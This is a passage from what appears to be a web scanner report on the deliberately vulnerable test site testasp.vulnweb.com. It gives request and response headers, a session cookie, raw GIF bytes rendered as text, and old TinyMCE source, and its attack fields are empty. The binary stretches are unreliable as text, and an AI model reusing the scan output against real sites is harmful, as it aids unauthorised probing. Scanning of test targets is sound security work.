üüüþþþúúúûûûÿþþá þþÿå1:ÿÿþæ:Bã$þÿþÿþÿáímrìzèMTä*3õ²µêU[öööä$-ìdjò«®çFMï â!æ/8ââï úÕÖùùúûúúò¥§æBIé_eìqvó»½ñíùÌÎç@GòöÑÓþúúùññ÷æçä(÷ââúÜÝùùùâ÷÷÷úêëýýýð÷ÝÝýóóñ¿Áêioâ!èCJøÇÉñ´¶ôÉËþÿÿðûßàî|îóÝÞïøÞßøõõîqx÷÷øø÷øþüüûàâíöÁÂùÓÔöÚÚîw|ôÆÈûøøòúÙÚíáûÝßäó¡ë`fúÏÑûÞßã&ð°øøøèHNýïï!ù,ddÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÀרÙÚÛÜÙÄ å 9Q9à×óñóàÆDé Y¨èÀ WH'Hß¾g^t@±bE(¼Æã A Æ(-ÚHá,Ä0+61°Ìå1@ Í8q²D!¨Q4øôÁ Éà AZ°iCL±1R ¥-Sn(Fìÿ(Tè°`¸]R.Ø8CJ[@9¡ )¿ v¥\P°AÊÄ.¤tbAÊ=,hHÙXØ o$H â:I)äIe TH©Øj*ÌDjñB&¿C æå3pD §C¢ V¸;L0 0&Øñ¸ @ÀX`Ô'ФÄ0H AÀî§`t ]`ÃP ,0ÀH¨á°üp.HH(¦¨â,¶¨â.Æ(ãÕÔhã8æ¨ã<öèã@)äDiäH&©äL6éäPF)åTViå«; |
| URL | http://testasp.vulnweb.com/Images/logo.gif |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 313 bytes. |
GET http://testasp.vulnweb.com/Images/logo.gif HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 248 bytes. |
HTTP/1.1 200 OK
Content-Type: image/gif Last-Modified: Thu, 29 May 2008 12:11:31 GMT Accept-Ranges: bytes ETag: "ceff952185c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 4933 |
| Response Body - size: 4,933 bytes. |
GIF89a2&÷HÍHå0¶0¨ò¨$«$îâHÄHªîëxÝxTÑTlálTÚTêHÒH0Ò0ôýîï0Å0TÌTÅÞ0º0ÿÿÿÆÍlÖlñ`Î`£0Î00Ì0`Ø`0°0`Ë``â`0®0lÑl¾HÙH±í<Å<0Ê0xâxxàxlÚlTàT`Þ``Ü``Ó`µHÜHHÚH¶xåxÊx×x$¾$`Ú`TÞT$Î$ÿÿ¿á
ËÊÌÉ???ÃÆÈÇ¿¿¿£½Ä§º¾°ÂÀ¢µ¸¤¨¶±¿ ¡ÁÅ»¬¹©®ª´¥«¯¼¦·þþý²³ïïï///___OOOÏÏÏ0Ç0ðßßßí¯¯¯`Ð`´ú´ñ´ù´`Í`oooá é`É``Ì`å1:¨ø¨´û´´ü´æ:Bã$xèxíøĘ̂÷¨êU[ímrä$-èMTä*3áTÄTìdjçFMüééå0¾0ítz`Ñ`æ/8ò²´â!ââöÂŨõ¨ðìä(üâãõ¼½öר<×<é_eò`Õ`xëxô¨¬ç@GèCJâ!ó£§êioúæçûÞßHÊHæBIïâlÝl$É$®<¼<òñ¦¨òH½HõÌÍýïïüäå÷ÓÔùßáúìì<Ú<TÖTñ±<È<ï}äáèHNã&ôÅÇë`fÐ$À$lçlõ°³ùØÙ¿HÕH$Ò$ö²µxØxïïñ £ë$¸$òº½üíîTÊT!ù,2&ÿ()Bp`II°I&B|ò¤IET2RѲq£Z¶¥d:'éгRK1Pbf¥¦Í@8ËèÜÙ¥ç.wî¼ú¢gàYz¥é5OÕ¨áCÕ«_¾¬Ñºf ¯zÂêé3¶O:h¥Í#HP<~âúC·M1vÛÚ[È_¿{f ÃØJø±;` <§²å?¹hæs7ݸ1CtÓqȨVí¤µk/^Àö"¶9r¤èÞ]¥÷ßU¦_BøãK7r¹çHABسkßν»÷ïàÃÿO¾¼ùóç EÎ9rá¿«H©wíÖ«ã#Z´fÌÌ1Yd b ahìaÈ^yÑåÇ[l¡Ext TñÕI5ÔO?éH#ÆäJ(E1ÒGT<Ñ"E1¤@JXÞ8æ¨ã<î¨{Ï)wDq¿ÅGßmµÅ¶§&ZgÿY6%V`ro©UY~µÕR%USI}TO]h'¦¨â eDQE9ÄPBac*è j÷ãtA"G¤»Ý~ª5iFa& T`iI×p½ ÖaUh¡UÉaCõ´N5Áÿ 'J(m1'w¨'}Öx]¡À+ì°R']{Æ-_|ºÙkê7iÔF)àih``{åðβåå¦fE¦N-EÔO®RF&Æ©¢,Úyg2$ÐÄöëï¿èz¬{Dö&_³I*É$jV¥×RYàaWî!%Bd<F¸~ ¦©c¹!¾Ánï8,¥h«Hõ¶g3îû+À8ç,%XAè@6§qðõ¶[®9Áä~ÓVËEMibÛúñÕúáÖ¸¥VH&ª¦[òÉnÆÊ2%Á3»*4#¿:Ç-wa÷!2]Ð/ÿk0ÂÏ*½piM?ýtI rµÆrê±X^.%2N%Î$ï¼tÖ{ï{æ[Ü9Êc,¬,K*çãÍÜ´{çÝDH·±¿ç·ÑÎ>´Óþ1¶F$W["B5tAØÖäZxîå$eò¯ªìùi«Í9ÔöA6ë8A6·áþûïïÊ)µÇm Ý>g·H#ül,{B²c´fÑæQùaÚ'%MAÌËX5ìÂ¥¶p-L!Ù:´½ ¡{ÓÙLB¯µ±MOÑêÌ]Àï /\4ê³û!ÃZïX´Ö'pÃ+Íÿ µ9<¦J @AEL¥ÓÌt¦¥°jM¯2Ûk%¾½O22¯p4 ~Ôh ÿeC K`Ú¤Ù(a {xDm¡A àÆ¤ç1²éBRÕRÆÆ&Á*&³ÓÆ+|ñªO+,ZqÆN¾¯kìWûG¡)¿in'8I-¦È- ²KÔ ®§H£EsíRY¼XbQRW»Ê×@2 MnÂÜ*B9¬Q«r ;! !°àR¸A Jha¥@ BñpÆ3§°ÐÀ®öÿP k=Æ h`p+5HèÔagÀ@%&ÚHxÀ<ÁÑDáûÀĸÁ`àðU³1gÏ&4ÕèJ0wL D¬,pGHÝÁGèn§==ªvxêÓì È%;Fè´;ªÝ¼aç©°Û" úU²fà©XpÄv$ÑÓ¦çPÑ1妰ztóq?¸DÆ"À8îqBè®Ä¥aa~X!`c~@c zÊ]¸-àP« ¨¸Z&Lt5ܰ#XÁ>8Äm¼ÙxL!ÓÚÿÃÝ +îp÷T»mØ-îüq§¸DÐU*\»=b;Ъp¡ÖPU¸LÀÎr±cCExU»vs«xt¤öÌUÅ^É6ÍXaX!L¢0ìcý`÷ aåºÚ·ÙÎf(: mÆF§« ±@c/PºÐÝ .dê WÈtÛA.¸Þ4¹Ù±!1Ö ¸Æ ±o³sÝcÁ 6ÅR£k7«âøÄ(«nÇUë!»ØA.3\F¼*Î8{׫ñUip¯fâ+ùR©¾EC~÷ØÔ½-°Pó3Xÿìh! XL`¢±w¾&Î7§$E-Nh$C¤Æ7´S7»»Áqѱ~w§ùC®,i#a>±[û\í ÷ÑÖï3pâçÚ°ouâ*$â ãj gл×Ö´÷j AX.pÙËv3aöPË»0àq hAÎ\1Ö¶(8ëYW)XðÜã.ð<8c ÁLg!ìÉmé7rqÆM°¢;ñpá}¡G;ÀSí¶êãÆØÔ¦ªw·s»g§ÒèN¥j#¯Òø®"ª[õË9<ÔkÆ6p° X¹5?ÿ¸Z)°Fürb óÇ«ò. ¸ÔÒùYy\ÄöæF~;Ü F÷Hp5hD«° e{Ô[Ø9E*n1 ~gàé8ã(´sb¥j§Ò(fõÁ»£i§ÝâÝùwÞ3+ØýîZMñÚ·«GDÚÑ«Nv5 üM "DkJpµHË?Æ&,¶MKSp Èèú«ÑLÍ«âRÞ¼¦.Î@^qµW¼¨W{ýXØQÅ[_² q§µ£[á¿íkçôÛù¾¹«¸¹»Õû {dî wý<ïäJ«]oMÿ3¦@È{ò3¯|Æn>«)`zf9ç·rÙ & ôÞ¸3v9àj#p'°u Á'FußQFfäPf$ ØA għÞ\Æm·pÕÇÎg7À$X&(}nÄ|ÒG¥¼Ó;Ý1ßw0r~NP W³ ã0ð%yÒµlÍÖ~ó~¢ò1´@à öçfWmrz1QZ&ñ3¯{ïö6è«pFý¬`F®0g[v]|F}!èpâQq*8iG×që(æµê%¢px ¨xNÀxNÿÂ\æWfÌfywÑW£ma³p5üÀBàö÷fÀ&T(V¨"X(ZHèn¦s:_ØôCgpF¸ÅpFÆ ?vsUÛvÂH|ÈÈy'|urw=ÖàFzøÆÁk.øÙ´ W#C'ç)p5¨¤ÐÖlSW£Bm°Oó*ð%Ïv5]õVôfÀ.1ذ2Wã iÓ¯ø±Ø èã'µÈëpFÝÒpFì©pFú0pØþ&i×GܸVÜ5FptwxèiB};µw#ÿ\%édO6kqT2ð8p"·^N 3 NPò8¡Ð ð8äPëGAÕ<1 WxtMØKð8Àç1°BÀ"á[1(daaÛ±f4 ` 1?«v C½øp=vT bo§UC@ØqÖ U-w ¯Æq [^u])k7KàþÕk%póAH@è_6 fa)6pÐnFI'$0/n \(FIehF ¤{9·Cà°T»ÕZøv~;D S$©$;)©j0ÿ)^×I'6bßuHæç~gJÉ!ðÐX¢®¡¼XÕòîÕSsëç)~ÐgX`=¹*Fñþ¤1Éh'±B5CÚA[wŰaCð íCÀÀVÐ+æØwÒµ[;;Ôµ{h1©|Øuiì ^;*U"kß4¤(ÅqC6¨;Ð ôðWó(0 C=À ô J2GYu+S Ú"9sYÛ" ?Ìðâá¡/ÄÜq°LÀ@¤ÛA X@IõSÀ$ÿ¨ ĸ#ðÊiE;PVk47À, <Â$)P Ð3(à: @.-Yrw0 ³À6A=w`Qà@"iÚ2ÅT'ö23ïÆ+´ùðB äñî³ â@Màª};´(FBH)d°CD-ð4QcXÉ âÒqKÕ³e*j°H¿LïRoò*6Qã#3`4ñF ¤@ ±P¢ò¦ À«x®K(QÆCEr0u$<£ë:¥¯³%5¢<E_ÿi9aã ÛHï"Bqâ2jãEȤ¡ná{´qMH:G&{²¡£á0Ó²!KÛB«1Ë%Eb2þú¯d2Û³9Þ/r">$aÔ+F´nû/p$§D@t´JÂãxG,5U[ Pò%rKw_Q.S.yEÔ&$+òò2,¢.Bj;{mû¶ûFÞ,À0)Bä4î1~;«  M.\s¸Ö£A°2>ë¬sB'ñE4CÕº¹Àë/F*·Éò;Í"³aN®4DÖ<~D«"H®{Aaj9#¶jâ*=+?û¬&Ä6ÿû»Á;¾ÁRJAÉ´&ë,Ð");X)T+Kr%ô*H%.G¬BE«ÂAÛ#"ÛIÎÊEº¶øÒAK¾ #@»,Ìb@É+8KÓ4P5RÓÊ)µ*³â"Óµù*³K¬¥W6Íê¬/3Àö¾¾ë+1#A¼²'æy#Q¹Á>¬°#A&A+*Á/á46q9±:Á& "Dá!J¡LáP!SQWaY±]á`!dagkÑo!sQ¶j|Ña1 q¡á!a ÁýA8ûK"BIÓÏ2µQ¹Ñ(ó Åaî¡ '@R; |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 263 bytes. |
HTTP/1.1 200 OK
Content-Type: application/javascript Last-Modified: Thu, 29 May 2008 12:11:36 GMT Accept-Ranges: bytes ETag: "7edd7d2485c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 132342 |
| Response Body - size: 132,342 bytes. |
/**
* $RCSfile: tiny_mce.js,v $ * $Revision: 1.301 $ * $Date: 2005/10/30 16:06:56 $ * * @author Moxiecode * @copyright Copyright � 2004, Moxiecode Systems AB, All rights reserved. */ function TinyMCE(){this.majorVersion="2";this.minorVersion="0RC4";this.releaseDate="2005-10-30";this.instances=new Array();this.stickyClassesLookup=new Array();this.windowArgs=new Array();this.loadedFiles=new Array();this.configs=new Array();this.currentConfig=0;this.eventHandlers=new Array();var ua=navigator.userAgent;this.isMSIE=(navigator.appName=="Microsoft Internet Explorer");this.isMSIE5=this.isMSIE&&(ua.indexOf('MSIE 5')!=-1);this.isMSIE5_0=this.isMSIE&&(ua.indexOf('MSIE 5.0')!=-1);this.isGecko=ua.indexOf('Gecko')!=-1;this.isGecko18=ua.indexOf('Gecko')!=-1&&ua.indexOf('rv:1.8')!=-1;this.isSafari=ua.indexOf('Safari')!=-1;this.isOpera=ua.indexOf('Opera')!=-1;this.isMac=ua.indexOf('Mac')!=-1;this.isNS7=ua.indexOf('Netscape/7')!=-1;this.isNS71=ua.indexOf('Netscape/7.1')!=-1;this.dialogCounter=0;if(this.isOpera){this.isMSIE=true;this.isGecko=false;this.isSafari=false;}this.idCounter=0;};TinyMCE.prototype.defParam=function(key,def_val){this.settings[key]=tinyMCE.getParam(key,def_val);};TinyMCE.prototype.init=function(settings){var theme;this.settings=settings;if(typeof(document.execCommand)=='undefined')return;if(!tinyMCE.baseURL){var elements=document.getElementsByTagName('script');for(var i=0;i<elements.length;i++){if(elements[i].src&&(elements[i].src.indexOf("tiny_mce.js")!=-1||elements[i].src.indexOf("tiny_mce_src.js")!=-1||elements[i].src.indexOf("tiny_mce_gzip.php")!=-1)){var src=elements[i].src;tinyMCE.srcMode=(src.indexOf('_src')!=-1)?'_src':'';src=src.substring(0,src.lastIndexOf('/'));tinyMCE.baseURL=src;break;}}}this.documentBasePath=document.location.href;if(this.documentBasePath.indexOf('?')!=-1)this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.indexOf('?'));this.documentURL=this.documentBasePath;this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.lastIndexOf('/'));if(tinyMCE.baseURL.indexOf('://')==-1&&tinyMCE.baseURL.charAt(0)!='/'){tinyMCE.baseURL=this.documentBasePath+"/"+tinyMCE.baseURL;}this.defParam("mode","none");this.defParam("theme","advanced");this.defParam("plugins","",true);this.defParam("language","en");this.defParam("docs_language",this.settings['language']);this.defParam("elements","");this.defParam("textarea_trigger","mce_editable");this.defParam("editor_selector","");this.defParam("editor_deselector","mceNoEditor");this.defParam("valid_elements","+a[id|style|rel|rev|charset|hreflang|dir|lang|tabindex|accesskey|type|name|href|target|title|class|onfocus|onblur|onclick|ondblclick|onmousedown|onmouseup|onmouseover|onmousemove|onmouseout|onkeypress|onkeydown|onkeyup],-strong/b[class|style],-em/i[class|style],-strike[class|style],-u[class|style],+p[style|dir|class|align],-ol[class|style],-ul[class|style],-li[class|style],br,img[id|dir|lang|longdesc|usemap|style|class|src|onmouseover|onmouseout|border=0|alt|title|hspace|vspace|width|height|align],-sub[style|class],-sup[style|class],-blockquote[dir|style],-table[border=0|cellspacing|cellpadding|width|height|class|align|summary|style|dir|id|lang|bgcolor|background|bordercolor],-tr[id|lang|dir|class|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor],tbody[id|class],thead[id|class],tfoot[id|class],-td[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor|scope],-th[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|scope],caption[id|lang|dir|class|style],-div[id|dir|class|align|style],-span[style|class|align],-pre[class|align|style],address[class|align|style],-h1[style|dir|class|align],-h2[style|dir|class|align],-h3[style|dir|class|align],-h4[style|dir|class|align],-h5[style|dir|class|align],-h6[style|dir|class|align],hr[class|style],font[face|size|style|id|class|dir|color]");this.defParam("extended_valid_elements","");this.defParam("invalid_elements","");this.defParam("encoding","");this.defParam("urlconverter_callback",tinyMCE.getParam("urlconvertor_callback","TinyMCE.prototype.convertURL"));this.defParam("save_callback","");this.defParam("debug",false);this.defParam("force_br_newlines",false);this.defParam("force_p_newlines",true);this.defParam("add_form_submit_trigger",true);this.defParam("relative_urls",true);this.defParam("remove_script_host",true);this.defParam("focus_alert",true);this.defParam("document_base_url",this.documentURL);this.defParam("visual",true);this.defParam("visual_table_class","mceVisualAid");this.defParam("setupcontent_callback","");this.defParam("fix_content_duplication",true);this.defParam("custom_undo_redo",true);this.defParam("custom_undo_redo_levels",-1);this.defParam("custom_undo_redo_keyboard_shortcuts",true);this.defParam("verify_css_classes",false);this.defParam("verify_html",true);this.defParam("apply_source_formatting",false);this.defParam("directionality","ltr");this.defParam("cleanup_on_startup",false);this.defParam("inline_styles",false);this.defParam("convert_newlines_to_brs",false);this.defParam("auto_reset_designmode",true);this.defParam("entities","160,nbsp,38,amp,34,quot,162,cent,8364,euro,163,pound,165,yen,169,copy,174,reg,8482,trade,8240,permil,181,micro,183,middot,8226,bull,8230,hellip,8242,prime,8243,Prime,167,sect,182,para,223,szlig,8249,lsaquo,8250,rsaquo,171,laquo,187,raquo,8216,lsquo,8217,rsquo,8220,ldquo,8221,rdquo,8218,sbquo,8222,bdquo,60,lt,62,gt,8804,le,8805,ge,8211,ndash,8212,mdash,175,macr,8254,oline,164,curren,166,brvbar,168,uml,161,iexcl,191,iquest,710,circ,732,tilde,176,deg,8722,minus,177,plusmn,247,divide,8260,frasl,215,times,185,sup1,178,sup2,179,sup3,188,frac14,189,frac12,190,frac34,402,fnof,8747,int,8721,sum,8734,infin,8730,radic,8764,sim,8773,cong,8776,asymp,8800,ne,8801,equiv,8712,isin,8713,notin,8715,ni,8719,prod,8743,and,8744,or,172,not,8745,cap,8746,cup,8706,part,8704,forall,8707,exist,8709,empty,8711,nabla,8727,lowast,8733,prop,8736,ang,180,acute,184,cedil,170,ordf,186,ordm,8224,dagger,8225,Dagger,192,Agrave,194,Acirc,195,Atilde,196,Auml,197,Aring,198,AElig,199,Ccedil,200,Egrave,202,Ecirc,203,Euml,204,Igrave,206,Icirc,207,Iuml,208,ETH,209,Ntilde,210,Ograve,212,Ocirc,213,Otilde,214,Ouml,216,Oslash,338,OElig,217,Ugrave,219,Ucirc,220,Uuml,376,Yuml,222,THORN,224,agrave,226,acirc,227,atilde,228,auml,229,aring,230,aelig,231,ccedil,232,egrave,234,ecirc,235,euml,236,igrave,238,icirc,239,iuml,240,eth,241,ntilde,242,ograve,244,ocirc,245,otilde,246,ouml,248,oslash,339,oelig,249,ugrave,251,ucirc,252,uuml,254,thorn,255,yuml,914,Beta,915,Gamma,916,Delta,917,Epsilon,918,Zeta,919,Eta,920,Theta,921,Iota,922,Kappa,923,Lambda,924,Mu,925,Nu,926,Xi,927,Omicron,928,Pi,929,Rho,931,Sigma,932,Tau,933,Upsilon,934,Phi,935,Chi,936,Psi,937,Omega,945,alpha,946,beta,947,gamma,948,delta,949,epsilon,950,zeta,951,eta,952,theta,953,iota,954,kappa,955,lambda,956,mu,957,nu,958,xi,959,omicron,960,pi,961,rho,962,sigmaf,963,sigma,964,tau,965,upsilon,966,phi,967,chi,968,psi,969,omega,8501,alefsym,982,piv,8476,real,977,thetasym,978,upsih,8472,weierp,8465,image,8592,larr,8593,uarr,8594,rarr,8595,darr,8596,harr,8629,crarr,8656,lArr,8657,uArr,8658,rArr,8659,dArr,8660,hArr,8756,there4,8834,sub,8835,sup,8836,nsub,8838,sube,8839,supe,8853,oplus,8855,otimes,8869,perp,8901,sdot,8968,lceil,8969,rceil,8970,lfloor,8971,rfloor,9001,lang,9002,rang,9674,loz,9824,spades,9827,clubs,9829,hearts,9830,diams,8194,ensp,8195,emsp,8201,thinsp,8204,zwnj,8205,zwj,8206,lrm,8207,rlm,173,shy,233,eacute,237,iacute,243,oacute,250,uacute,193,Aacute,225,aacute,201,Eacute,205,Iacute,211,Oacute,218,Uacute,221,Yacute,253,yacute");this.defParam("entity_encoding","named");this.defParam("cleanup_callback","");this.defParam("add_unload_trigger",true);this.defParam("ask",false);this.defParam("nowrap",false);this.defParam("auto_resize",false);this.defParam("auto_focus",false);this.defParam("cleanup",true);this.defParam("remove_linebreaks",true);this.defParam("button_tile_map",false);this.defParam("submit_patch",true);this.defParam("browsers","msie,safari,gecko,opera");this.defParam("dialog_type","window");this.defParam("accessibility_warnings",true);this.defParam("merge_styles_invalid_parents","");this.defParam("force_hex_style_colors",true);this.defParam("trim_span_elements",true);this.defParam("convert_fonts_to_spans",false);this.defParam("doctype",'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">');this.defParam("font_size_classes",'');this.defParam("font_size_style_values",'xx-small,x-small,small,medium,large,x-large,xx-large');this.defParam("event_elements",'a,img');if(this.isMSIE&&this.settings['browsers'].indexOf('msie')==-1)return;if(this.isGecko&&this.settings['browsers'].indexOf('gecko')==-1)return;if(this.isSafari&&this.settings['browsers'].indexOf('safari')==-1)return;if(this.isOpera&&this.settings['browsers'].indexOf('opera')==-1)return;var baseHREF=tinyMCE.settings['document_base_url'];if(baseHREF.indexOf('?')!=-1)baseHREF=baseHREF.substring(0,baseHREF.indexOf('?'));this.settings['base_href']=baseHREF.substring(0,baseHREF.lastIndexOf('/'))+"/";theme=this.settings['theme'];this.blockRegExp=new RegExp("^(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|blockquote|center|dl|dir|fieldset|form|noscript|noframes|menu|isindex)$","i");this.posKeyCodes=new Array(13,45,36,35,33,34,37,38,39,40);this.uniqueURL='http://tinymce.moxiecode.cp/mce_temp_url';this.settings['theme_href']=tinyMCE.baseURL+"/themes/"+theme;if(!tinyMCE.isMSIE)this.settings['force_br_newlines']=false;if(tinyMCE.getParam("content_css",false)){var cssPath=tinyMCE.getParam("content_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['content_css']=this.documentBasePath+"/"+cssPath;else this.settings['content_css']=cssPath;}else this.settings['content_css']='';if(tinyMCE.getParam("popups_css",false)){var cssPath=tinyMCE.getParam("popups_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['popups_css']=this.documentBasePath+"/"+cssPath;else this.settings['popups_css']=cssPath;}else this.settings['popups_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_popup.css";if(tinyMCE.getParam("editor_css",false)){var cssPath=tinyMCE.getParam("editor_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['editor_css']=this.documentBasePath+"/"+cssPath;else this.settings['editor_css']=cssPath;}else this.settings['editor_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_ui.css";if(tinyMCE.settings['debug']){var msg="Debug: \n";msg+="baseURL: "+this.baseURL+"\n";msg+="documentBasePath: "+this.documentBasePath+"\n";msg+="content_css: "+this.settings['content_css']+"\n";msg+="popups_css: "+this.settings['popups_css']+"\n";msg+="editor_css: "+this.settings['editor_css']+"\n";alert(msg);}this._initCleanup();if(this.configs.length==0){if(this.isSafari&&this.getParam('safari_warning',true))alert("Safari support is very limited and should be considered experimental.\nSo there is no need to even submit bugreports on this early version.\nYou can disable this message by setting: safari_warning option to false");tinyMCE.addEvent(window,"load",TinyMCE.prototype.onLoad);if(tinyMCE.isMSIE){if(tinyMCE.settings['add_unload_trigger']){tinyMCE.addEvent(window,"unload",TinyMCE.prototype.unloadHandler);tinyMCE.addEvent(window.document,"beforeunload",TinyMCE.prototype.unloadHandler);}}else{if(tinyMCE.settings['add_unload_trigger'])tinyMCE.addEvent(window,"unload",function(){tinyMCE.triggerSave(true,true);});}}this.loadScript(tinyMCE.baseURL+'/themes/'+this.settings['theme']+'/editor_template'+tinyMCE.srcMode+'.js');this.loadScript(tinyMCE.baseURL+'/langs/'+this.settings['language']+'.js');this.loadCSS(this.settings['editor_css']);var themePlugins=tinyMCE.getParam('plugins','',true,',');if(this.settings['plugins']!=''){for(var i=0;i<themePlugins.length;i++)this.loadScript(tinyMCE.baseURL+'/plugins/'+themePlugins[i]+'/editor_plugin'+tinyMCE.srcMode+'.js');}settings['index']=this.configs.length;this.configs[this.configs.length]=settings;};TinyMCE.prototype.loadScript=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<sc'+'ript language="javascript" type="text/javascript" src="'+url+'"></script>');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.loadCSS=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<link href="'+url+'" rel="stylesheet" type="text/css" />');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.importCSS=function(doc,css_file){if(css_file=='')return;if(typeof(doc.createStyleSheet)=="undefined"){var elm=doc.createElement("link");elm.rel="stylesheet";elm.href=css_file;if((headArr=doc.getElementsByTagName("head"))!=null&&headArr.length>0)headArr[0].appendChild(elm);}else var styleSheet=doc.createStyleSheet(css_file);};TinyMCE.prototype.confirmAdd=function(e,settings){var elm=tinyMCE.isMSIE?event.srcElement:e.target;var elementId=elm.name?elm.name:elm.id;tinyMCE.settings=settings;if(!elm.getAttribute('mce_noask')&&confirm(tinyMCELang['lang_edit_confirm']))tinyMCE.addMCEControl(elm,elementId);elm.setAttribute('mce_noask','true');};TinyMCE.prototype.updateContent=function(form_element_name){var formElement=document.getElementById(form_element_name);for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();if(inst.formElement==formElement){var doc=inst.getDoc();tinyMCE._setHTML(doc,inst.formElement.value);if(!tinyMCE.isMSIE)doc.body.innerHTML=tinyMCE._cleanupHTML(inst,doc,this.settings,doc.body,inst.visualAid);}}};TinyMCE.prototype.addMCEControl=function(replace_element,form_element_name,target_document){var id="mce_editor_"+tinyMCE.idCounter++;var inst=new TinyMCEControl(tinyMCE.settings);inst.editorId=id;this.instances[id]=inst;inst.onAdd(replace_element,form_element_name,target_document);};TinyMCE.prototype.triggerSave=function(skip_cleanup,skip_callback){for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();tinyMCE.settings['preformatted']=false;if(typeof(skip_cleanup)=="undefined")skip_cleanup=false;if(typeof(skip_callback)=="undefined")skip_callback=false;tinyMCE._setHTML(inst.getDoc(),inst.getBody().innerHTML);if(inst.settings['cleanup']==false){tinyMCE.handleVisualAid(inst.getBody(),true,false,inst);tinyMCE._setEventsEnabled(inst.getBody(),true);}tinyMCE._customCleanup(inst,"submit_content_dom",inst.contentWindow.document.body);var htm=skip_cleanup?inst.getBody().innerHTML:tinyMCE._cleanupHTML(inst,inst.getDoc(),this.settings,inst.getBody(),this.visualAid,true);htm=tinyMCE._customCleanup(inst,"submit_content",htm);if(tinyMCE.settings["encoding"]=="xml"||tinyMCE.settings["encoding"]=="html")htm=tinyMCE.convertStringToXML(htm);if(!skip_callback&&tinyMCE.settings['save_callback']!="")var content=eval(tinyMCE.settings['save_callback']+"(inst.formTargetElementId,htm,inst.getBody());");if((typeof(content)!="undefined")&&content!=null)htm=content;htm=tinyMCE.regexpReplace(htm,"(","(","gi");htm=tinyMCE.regexpReplace(htm,")",")","gi");htm=tinyMCE.regexpReplace(htm,";",";","gi");htm=tinyMCE.regexpReplace(htm,""",""","gi");htm=tinyMCE.regexpReplace(htm,"^","^","gi");if(inst.formElement)inst.formElement.value=htm;}};TinyMCE.prototype._setEventsEnabled=function(node,state){var events=new Array('onfocus','onblur','onclick','ondblclick','onmousedown','onmouseup','onmouseover','onmousemove','onmouseout','onkeypress','onkeydown','onkeydown','onkeyup');var evs=tinyMCE.settings['event_elements'].split(',');for(var y=0;y<evs.length;y++){var elms=node.getElementsByTagName(evs[y]);for(var i=0;i<elms.length;i++){var event="";for(var x=0;x<events.length;x++){if((event=tinyMCE.getAttrib(elms[i],events[x]))!=''){event=tinyMCE.cleanupEventStr(""+event);if(!state)event="return true;"+event;else event=event.replace(/^return true;/gi,'');elms[i].removeAttribute(events[x]);elms[i].setAttribute(events[x],event);}}}}};TinyMCE.prototype.resetForm=function(form_index){var formObj=document.forms[form_index];for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();for(var i=0;i<formObj.elements.length;i++){if(inst.formTargetElementId==formObj.elements[i].name){inst.getBody().innerHTML=formObj.elements[i].value;return;}}}};TinyMCE.prototype.execInstanceCommand=function(editor_id,command,user_interface,value,focus){var inst=tinyMCE.getInstanceById(editor_id);if(inst){if(typeof(focus)=="undefined")focus=true;if(focus)inst.contentWindow.focus();inst.autoResetDesignMode();this.selectedElement=inst.getFocusElement();this.selectedInstance=inst;tinyMCE.execCommand(command,user_interface,value);if(tinyMCE.isMSIE&&window.event!=null)tinyMCE.cancelEvent(window.event);}};TinyMCE.prototype.execCommand=function(command,user_interface,value){user_interface=user_interface?user_interface:false;value=value?value:null;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();switch(command){case 'mceHelp':var template=new Array();template['file']='about.htm';template['width']=480;template['height']=380;tinyMCE.openWindow(template,{tinymce_version:tinyMCE.majorVersion+"."+tinyMCE.minorVersion,tinymce_releasedate:tinyMCE.releaseDate,inline:"yes"});return;case 'mceFocus':var inst=tinyMCE.getInstanceById(value);if(inst)inst.contentWindow.focus();return;case "mceAddControl":case 